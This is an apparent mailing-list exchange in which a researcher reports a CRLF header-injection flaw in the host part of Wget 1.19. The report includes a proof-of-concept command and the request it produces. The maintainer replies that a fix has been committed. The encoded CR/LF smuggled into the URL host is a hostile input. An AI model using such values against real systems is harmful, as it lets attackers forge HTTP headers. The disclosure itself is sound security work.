On Monday, March 6, 2017 3:42:24 AM CET Orange Tsai wrote: > Hi > > I just found that there is a CRLF Injection in the latest version of Wget > 1.19. > > Wget uses urlencode to encode CRLF in PATH part but doesn't use in HOST > port. So an attacker can inject arbitrary header in the request. > > > For example: > > # This will fail > $ wget 'http://127.0.0.1/%0d%0Cookie: hi' > > GET /%0d%0Cookie:%20hi HTTP/1.1 > User-Agent: Wget/1.19 (linux-gnu) > Accept: */* > Accept-Encoding: identity > Host: 127.0.0.1 > Connection: Keep-Alive > > > # This will work > $ wget 'http://127.0.0.1%0d%0aCookie%3a hi%0a/' > > GET / HTTP/1.1 > User-Agent: Wget/1.19 (linux-gnu) > Accept: */* > Accept-Encoding: identity > Host: [127.0.0.1 > *cookie: hi* > ] > Connection: Keep-Alive > > > Wish you aware this, thanks for your reading :)
Thanks, just pushed a commit, not allowing control chars in host part. Regards, Tim
signature.asc
Description: This is a digitally signed message part.
